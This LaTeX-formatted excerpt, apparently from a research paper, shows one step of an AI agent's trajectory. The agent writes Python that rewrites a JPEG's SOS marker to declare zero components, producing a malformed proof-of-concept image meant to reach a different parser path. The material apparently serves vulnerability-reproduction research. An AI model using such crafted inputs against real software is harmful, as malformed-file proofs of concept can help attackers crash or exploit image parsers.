\begin{MintedVerbatim}[commandchars=\\\{\}]
[Step: 46/52]
\PYGZdl{} run\PYGZus{}ipython ```python
\PYGZsh{} Try a scan with 0 components (invalid, but may trigger a different path)
with open(\PYGZsq{}/workspace/poc.jpg\PYGZsq{}, \PYGZsq{}rb\PYGZsq{}) as f:
    data = bytearray(f.read())

sos = find\PYGZus{}sos(data)
if sos == \PYGZhy{}1:
    raise Exception(\PYGZsq{}SOS marker not found\PYGZsq{})

\PYGZsh{} Set number of components to 0
length = struct.unpack(\PYGZsq{}\PYGZgt{}H\PYGZsq{}, data[sos+2:sos+4])[0]
data[sos+4] = 0
\PYGZsh{} Remove the next 6 bytes (component spec for 3 components)
del data[sos+5:sos+11]
\PYGZsh{} Fix the length field (was 0x0C for 3 components, should be 0x06 for 0)
data[sos+2:sos+4] = struct.pack(\PYGZsq{}\PYGZgt{}H\PYGZsq{}, length \PYGZhy{} 6)

[...]
```
Zero\PYGZhy{}component scan JPEG written to /workspace/poc\PYGZus{}nocomp.jpg
[Jupyter current working directory: /workspace]
[Jupyter Python interpreter: /openhands/poetry/openhands\PYGZhy{}ai\PYGZhy{}5O4\PYGZus{}aCHf\PYGZhy{}py3.12/bin/python]
\end{MintedVerbatim}
